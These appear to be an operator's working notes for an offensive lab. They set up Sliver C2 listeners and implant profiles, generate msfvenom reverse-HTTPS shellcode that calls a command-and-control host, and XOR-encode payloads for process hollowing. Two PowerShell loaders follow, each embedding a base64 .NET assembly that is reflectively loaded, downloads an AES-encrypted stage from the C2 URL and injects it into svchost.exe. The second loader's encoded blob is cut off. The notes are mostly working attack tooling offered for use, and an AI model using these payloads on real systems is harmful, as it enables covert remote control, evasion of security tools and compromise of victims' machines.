Listener
https -L 10.8.0.154 -l 443
Setup for Rustware
profiles new -b https://10.8.0.154:443 --format shellcode --arch x86 osep_86
profiles new -b https://10.8.0.154:443 --format shellcode --arch amd64 osep_64
profiles new -b https://10.8.2.41:443 --arch x64 -o linux vulnhub64_linux
Setup for Powershell payload
profiles new -b https://10.8.0.154:443 --skip-symbols --format shellcode --arch amd64 sliver64
profiles new -b https://192.168.45.159:443 --skip-symbols --format shellcode --arch x86 sliver86
Stage Listener for Rustware
stage-listener --url http://10.8.0.154:8443 --profile osep_64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t --aes-encrypt-iv 8y/B?E(G+KbPeShV
stage-listener --url http://10.8.0.154:8444 --profile osep_86 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t --aes-encrypt-iv 8y/B?E(G+KbPeShV
Stage Listener for msfvenom Payload
stage-listener --url https://10.8.0.154:8445 --profile osep_64 --prepend-size
Stage Listener for C# payload
stage-listener --url https://10.8.0.154:8446 --profile sliver64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
stage-listener --url https://10.8.0.154:8447 --profile sliver86 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t6v9y$B&E)H@McQfT --aes-encrypt-iv 8y/B?E(G+KbPeShV
Generating msf payload
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.8.0.154 LPORT=8445 LURI=/hello.woff -f raw -o osep_64
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.8.0.154 LPORT=8445 LURI=/hello.woff -f csharp -o osep_64_csharp
msfvenom -p windows/x64/custom/reverse_winhttps LHOST=10.10.14.5 LPORT=8448 LURI=/hello.woff -f csharp -o mistpayload
profiles generate vulnhub64_linux
- XoR the above csharp with xor_encoder with key 0xfa
- GO to windows machine and paste the shellcode in the Process Hollowing code
- Compile the code
Generating C# shellcoder runner
sliverphollow64.txt
vim sliverphollow64.txt
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYCAAdf57gAAAAAAAAAAPAAIiALAjAAAB4AAAAEAAAAAAAAAAAAAAAgAAAAAACAAQAAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAAAAAgAAAAAAAAMAYIUAAEAAAAAAAABAAAAAAAAAAAAQAAAAAAAAIAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAABAAACYAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcDsAADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAABIAAAAAAAAAAAAAAAudGV4dAAAABgcAAAAIAAAAB4AAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACYAwAAAEAAAAAEAAAAIAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABIAAAAAgAFABQkAABcFwAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATMAoAFwEAAAEAABEoEQAACn4+AAAEJS0XJn49AAAE/gYQAAAGcxIAAAolgD4AAAQoEwAACnQfAAABKBQAAApzDQAABgJvFQAACgpzFgAACgsFLDQOBCwwHxATCysQBwYRC5FvFwAAChELF1gTCxELBo5pF1kx5wdvGAAACgUOBCgHAAAGDCsCBgwIBCgGAAAGDQMTBAmOaRMFcwsAAAYTBhEGFn02AAAEcgEAAHARBCgZAAAKFBQUFxp+GgAAChQRBhIHKAEAAAYmEQd7CAAABCUWcxsAAAoRBX4EAAAEfgMAAAQoAgAABhMIFhMJEgoJjmkoGwAACiURCAkRChEJKAMAAAYmFnMbAAAKFhEIFnMbAAAKFhZzGwAACigEAAAGJioAGzACALkAAAACAAARFAoDcisAAHAoHAAACixHcx0AAAoLAnMeAAAKDAgWcx8AAAoNCQdvIAAACt4UCSwGCW8hAAAK3AgsBghvIQAACtwHbyIAAAoK3goHLAYHbyEAAArcBioDcj0AAHAoHAAACixUcx0AAAoTBAJzHgAAChMFEQUWcyMAAAoTBhEGEQRvIAAACt4YEQYsBxEGbyEAAArcEQUsBxEFbyEAAArcEQRvIgAACgreDBEELAcRBG8hAAAK3AYqAioAAAABTAAAAgAkAAktAAoAAAAAAgAcABs3AAoAAAAAAgAVADVKAAoAAAAAAgB8AAuHAAwAAAAAAgByACGTAAwAAAAAAgBqAD+pAAwAAAAAGzAEAIEAAAADAAARAwoECygkAAAKDAgGbyUAAAoIB28mAAAKCBdvJwAACggIbygAAAoIbykAAApvKgAACg0Ccx4AAAoTBBEECRdzKwAAChMFEQUCFgKOaW8sAAAKEQRvIgAAChMG3iIRBSwHEQVvIQAACtwRBCwHEQRvIQAACtwILAYIbyEAAArcEQYqAAAAASgAAAIARQAXXAAMAAAAAAIAOgAuaAAMAAAAAAIACgBqdAAKAAAAAB4CKC0AAAoqSh9AgAMAAAQgABAAAIAEAAAEKnoCfhoAAAp9BgAABAIoLQAACgICKAEAACt9BQAABCoAABMwAgBgAAAAAAAAAAJ+GgAACn0sAAAEAn4aAAAKfS0AAAQCfhoAAAp9LgAABAJ+GgAACn05AAAEAn4aAAAKfToAAAQCfhoAAAp9OwAABAJ+GgAACn08AAAEAigtAAAKAgIoAgAAK30rAAAEKk4CAygvAAAKJSCA8PoCbzAAAAoqHgIoMQAACioucw8AAAaAPQAABCoeAigtAAAKKgoXKgBCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAD4BwAAI34AAGQIAACoCwAAI1N0cmluZ3MAAAAADBQAAEgAAAAjVVMAVBQAABAAAAAjR1VJRAAAAGQUAAD4AgAAI0Jsb2IAAAAAAAAAAgAAAVcdAhwJCgAAAPoBMwAWAAABAAAALQAAAAgAAAA+AAAAEAAAACoAAAAxAAAAHgAAABAAAAADAAAAAQAAAAEAAAAEAAAAAQAAAAIAAAAGAAAAAgAAAAAAOQcBAAAAAAAGAL0FGAkGACoGGAkGANIE4ggPADgJAAAGAPoELggGAJEFLggGAHIFLggGABEGLggGAN0FLggGAPYFLggGABEFLggGAOYE+QgGAMQE+QgGAFUFLggGACwFkQYGAHAKlwcGACcAdQMGAIIHdwEKAFwHAwgKAHcHAwgGAPUINQsGAMYHNQsGAGoHNQsGAFQElwcGAK4FlwcGANcHlwcKAIwKgQoKAK8KgQoKALkGlwcGAKkEGAkKAL0GkQsGAHcEVwkKAPMHVwkKAAYKkQsKAH8IgQoGAJoElwcGAKsGlwcGANsIlwcGAIgHdwEKAPkDAwgGAAkElwcGAJ4HNQsGANwDNQsGAOgDNQsGADEH+QgAAAAAWAAAAAAAAQABAAEAEACPB2QIQQABAAEACgAQAKwJAABBAAUACgAKARAAGwgAAGEACAALAAIBAADPCQAAaQAMAAsACgAQAEkIAABBACsACwACABAAxgoAAG0APQAMAAMhEABxAwAAQQA9AA4AEQAeC5QBEQDuApQBEQDkAJcBEQCOApcBBgCyBpoBBgC2CG0ABgAVBJ0BBgAmCm0ABgDFA20ABgCmA5oBBgCbA5oBBgZLA5cBVoBoAqABVoB2AqABVoCKAKABVoA+AqABVoDRAKABVoAoAqABVoDGAaABVoDyAaABVoDaAaABVoCBAaABVoC2AqABVoBBAaABVoArAaABVoC2AaABVoAiAqABVoAGAqABVoAXA6ABVoAvA6ABVoBPAqABVoDRAqABVoBZAaABVoCbAKABVoBwAKABVoAKAaABVoC3AKABVoACA6ABVoCaAaABVoD7AKABVoCnAaABVoCZAqABBgBlA5oBBgDRA20ABgBaCG0ABgAkBG0ABgATA5oBBgBHA5oBBgBbBpoBBgBjBpoBBgDqCZoBBgD4CZoBBgBFBZoBBgDiCZoBBgD7CqQBBgA8AKQBBgBIAG0ABgDbCm0ABgDlCm0ABgCfCG0ANgBUAKcBFgABAKsBAAAAAIAAliBhAK8BAQAAAAAAgACWIAcLwwELAAAAAACAAJYgXwvMARAAAAAAAIAAkSCyA9YBFQBIIAAAAACWAEgG4QEcAGwhAAAAAJYAXgrsASEAgCIAAAAAlgCkCvQBIwA4IwAAAACGGKkIBgAmAEAjAAAAAJEYrwj/ASYAUyMAAAAAhhipCAYAJgB0IwAAAACGGKkIBgAmAOAjAAAAAMQArAruACYA9CMAAAAAhhipCAYAJwD8IwAAAACRGK8I/wEnAAgkAAAAAIYYqQgGACcAECQAAAAAgwALAAMCJwAAAAEALAQAAAIAPgQAAAMAmAkAAAQAhQkAAAUARwkAAAYAvwkAAAcAlgoAAAgAcgsBAAkARwgCAAoAGQgAAAEAJgoAAAIAPQoAAAMAdwYAAAQAXgQAAAUAdwoAAAEAJgoAAAIALwoAAAMAeAgAAAQAdwYAAAUA3AcAAAEAJgoAAAIAhQkAAAMAawYAAAQARwoAAAUAkwgAAAYAvwkAAAcAkAMAAAEAWAcAAAIAUgsAAAMAsQcAAAQAHgsAAAUA7gIAAAEAYAMAAAIAsQcAAAEA8AoAAAIAHgsAAAMA7gIAAAEAVgoAAAEAcQgAAAIAhwQAAAMA/QcAAAQAFgoJAKkIAQARAKkIBgAZAKkICgApAKkIEAAxAKkIEAA5AKkIEABBAKkIEABJAKkIEABRAKkIEABZAKkIEABhAKkIFQBpAKkIEABxAKkIEAB5AKkIEADJAKkIBgDxAKkIBgAZAeEGMgD5AKkINwAhAUwEPQAZAQkHSQDZAFMDTwAMAKkIBgAMAM0DWwAMABYLYQApAWkKZwAxAVUIbQAxAakIAQApAYULgQCRAKkIBgCRAKkIhwCZAKkIjQA5AUAIlwBJAW8EBgCRABYLngChAKkIjQCpAJMEtABRAS0LhwBRAfsChwBRAYUGuQBRASULngBRAfQCngBRAcsIwAC5AKkIyQA5AaME1QCBAKkIBgBpAX4G3QDZAKwK7gDhALoKAQDZAKkIBgAJADQA/gAJADgAAwEJADwACAEJAEAADQEJAEQAEgEJAEgAFwEJAEwAHAEJAFAAIQEJAFQAJgEJAFgAKwEJAFwAMAEJAGAANQEJAGQAOgEJAGgAPwEJAGwARAEJAHAASQEJAHQATgEJAHgAUwEJAHwAWAEJAIAAXQEJAIQAYgEJAIgAZwEJAIwAbAEJAJAAcQEJAJQAdgEJAJgAewEJAJwAgAEJAKAAhQEJAKQAigEJAKgAjwEuAAsAEQIuABMAGgIuABsAOQIuACMAQgIuACsAVQIuADMAVQIuADsAVQIuAEMAQgIuAEsAWwIuAFMAVQIuAFsAVQIuAGMAcwIuAGsAnQIuAHMAqgKjAHsA/gADAYMA/gAaAHAAowBLB1UAAAEDAGEAAQAAAQUABwsBAAABBwBfCwEAAAEJALIDAQAEgAAAAQAAAAAAAAAAAAAAAAAuAAAABAAAAAAAAAAAAAAA9QBoAwAAAAAEAAAAAAAAAAAAAAD1AJcHAAAAAAMAAgAEAAIABQACAAYAAgAHAAIACAACAF0A5ABdAOkAAAAAPD45X18xMl8wADxEb3dubG9hZEFuZEV4ZWN1dGU+Yl9fMTJfMABMaXN0YDEAQ2xhc3NMaWJyYXJ5MQBjYlJlc2VydmVkMgBscFJlc2VydmVkMgA8PjkAPE1vZHVsZT4AQ3JlYXRlUHJvY2Vzc0EAQ1JFQVRFX0JSRUFLQVdBWV9GUk9NX0pPQgBDUkVBVEVfU1VTUEVOREVEAFBST0NFU1NfTU9ERV9CQUNLR1JPVU5EX0VORABDUkVBVEVfREVGQVVMVF9FUlJPUl9NT0RFAENSRUFURV9ORVdfQ09OU09MRQBQQUdFX0VYRUNVVEVfUkVBRFdSSVRFAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBTeXN0ZW0uSU8AQ1JFQVRFX05FV19QUk9DRVNTX0dST1VQAFBST0ZJTEVfVVNFUgBQUk9GSUxFX1NFUlZFUgBDUkVBVEVfRk9SQ0VET1MASURMRV9QUklPUklUWV9DTEFTUwBSRUFMVElNRV9QUklPUklUWV9DTEFTUwBISUdIX1BSSU9SSVRZX0NMQVNTAEFCT1ZFX05PUk1BTF9QUklPUklUWV9DTEFTUwBCRUxPV19OT1JNQUxfUFJJT1JJVFlfQ0xBU1MAREVUQUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJPQ0VTUwBNRU1fQ09NTUlUAENSRUFURV9JR05PUkVfU1lTVEVNX0RFRkFVTFQAQ1JFQVRFX1VOSUNPREVfRU5WSVJPTk1FTlQARVhURU5ERURfU1RBUlRVUElORk9fUFJFU0VOVABBRVNJVgBnZXRfSVYAc2V0X0lWAENSRUFURV9OT19XSU5ET1cAZHdYAElOSEVSSVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAERvd25sb2FkRGF0YQBkYXRhAGNiAG1zY29ybGliADw+YwBTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYwBscFRocmVhZElkAGR3VGhyZWFkSWQAZHdQcm9jZXNzSWQAQ3JlYXRlUmVtb3RlVGhyZWFkAGhUaHJlYWQAQWRkAGxwUmVzZXJ2ZWQAUGFkZGluZ01vZGUAQ3J5cHRvU3RyZWFtTW9kZQBDb21wcmVzc2lvbk1vZGUASURpc3Bvc2FibGUAYkluaGVyaXRIYW5kbGUAbHBUaXRsZQBscEFwcGxpY2F0aW9uTmFtZQBscENvbW1hbmRMaW5lAENvbWJpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUARGlzcG9zZQBYNTA5Q2VydGlmaWNhdGUAY2VydGlmaWNhdGUAQ3JlYXRlAERlbGVnYXRlAFdyaXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBEb3dubG9hZEFuZEV4ZWN1dGUAZHdYU2l6ZQBkd1lTaXplAGR3U3RhY2tTaXplAGR3U2l6ZQBTaXplT2YAc2V0X1BhZGRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBTdHJpbmcATGVuZ3RoAFVyaQBSZW1vdGVDZXJ0aWZpY2F0ZVZhbGlkYXRpb25DYWxsYmFjawBnZXRfU2VydmVyQ2VydGlmaWNhdGVWYWxpZGF0aW9uQ2FsbGJhY2sAc2V0X1NlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrAE1hcnNoYWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAHVybABEZWZsYXRlU3RyZWFtAENyeXB0b1N0cmVhbQBHWmlwU3RyZWFtAE1lbW9yeVN0cmVhbQBQcm9ncmFtAFN5c3RlbQBTeW1tZXRyaWNBbGdvcml0aG0AQ29tcHJlc3Npb25BbGdvcml0aG0ASUNyeXB0b1RyYW5zZm9ybQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AWDUwOUNoYWluAGNoYWluAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBDb3B5VG8AbHBTdGFydHVwSW5mbwBaZXJvAGxwRGVza3RvcABTbDF2ZXJMb2FkZXIAc2VuZGVyAGJ1ZmZlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgAuY2N0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAQ3JlYXRlRGVjcnlwdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAQWVzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5Llg1MDlDZXJ0aWZpY2F0ZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAU3NsUG9saWN5RXJyb3JzAHNzbFBvbGljeUVycm9y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"
$decodeStr = [System.Convert]::FromBase64String($encodeStr)
[System.Reflection.Assembly]::Load($decodeStr)
$url = "https://10.8.0.154:8446/test.woff"
$TargetBinary = "svchost.exe"
[byte[]]$AESKey = 0x44,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56,0x6d,0x59,0x71,0x33,0x74,0x36,0x76,0x39,0x79,0x24,0x42,0x26,0x45,0x29,0x48,0x40,0x4d,0x63,0x51,0x66,0x54
[byte[]]$AESIV = 0x38,0x79,0x2f,0x42,0x3f,0x45,0x28,0x47,0x2b,0x4b,0x62,0x50,0x65,0x53,0x68,0x56
$CompressionAlgorithm = "deflate9"
[Sl1verLoader.Program]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
sliverphollow86.txt
vim sliverphollow86.txt
$encodeStr = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABz/L/kAAAAAAAAAAOAAAiELATAAAB4AAAAGAAAAAAAA4jwAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJA8AABPAAAAAEAAAJgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAB0PAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA6BwAAAAgAAAAHgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJgDAAAAQAAAAAQAAAAgAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAJAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADEPAAAAAAAAEgAAAACAAUA/CQAAHgXAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwCgBMAQAAAQAAEQAoEQAACn4+AAAEJS0XJn49AAAE/gYQAAAGcxIAAAolgD4AAAQoEwAACnQfAAABKBQAAAoAcw0AAAYKBgJvFQAACgtzFgAACgwFLAcOBBT+AysBFhMREREsQQAfEBMSKxMACAcREpFvFwAACgAAERIXWBMSERIHjmkXWf4CFv4BExMREy3bCG8YAAAKDQkFDgQoBwAABhMEACsFAAcTBAARBAQoBgAABhMFAxMGEQWOaRMHcwsAAAYTCBEIFn02AAAEcgEAAHARBigZAAAKEwoRChQUFBcafhoAAAoUEQgSCSgBAAAGEwsRCXsIAAAEEwwRDBZzGwAAChEHfgQAAAR+AwAABCgCAAAGEw0WEw4SDxEFjmkoGwAAChEMEQ0RBREPEQ4oAwAABhMQEQwWcxsAAAoWEQ0WcxsAAAoWFnMbAAAKKAQAAAYmKwAqGzACAOsAAAACAAARABQKA3IrAABwKBwAAAoLByxbAHMdAAAKDAACcx4AAAoNAAkWcx8AAAoTBAARBAhvIAAACgAA3g0RBCwIEQRvIQAACgDcAN4LCSwHCW8hAAAKANwIbyIAAAoKAN4LCCwHCG8hAAAKANwGEwUrewNyPQAAcCgcAAAKEwYRBixkAHMdAAAKEwcAAnMeAAAKEwgAEQgWcyMAAAoTCQARCREHbyAAAAoAAN4NEQksCBEJbyEAAAoA3ADeDREILAgRCG8hAAAKANwRB28iAAAKCgDeDREHLAgRB28hAAAKANwGEwUrBgACEwUrABEFKgABTAAAAgArAA04AA0AAAAAAgAhACdIAAsAAAAAAgAZAERdAAsAAAAAAgCaAA6oAA0AAAAAAgCPACm4AA0AAAAAAgCGAErQAA0AAAAAGzAEAIwAAAADAAARAAMKBAsoJAAACgwACAZvJQAACgAIB28mAAAKAAgXbycAAAoACAhvKAAACghvKQAACm8qAAAKDQJzHgAAChMEABEECRdzKwAAChMFABEFAhYCjmlvLAAACgARBG8iAAAKEwbeJREFLAgRBW8hAAAKANwRBCwIEQRvIQAACgDcCCwHCG8hAAAKANwRBioBKAAAAgB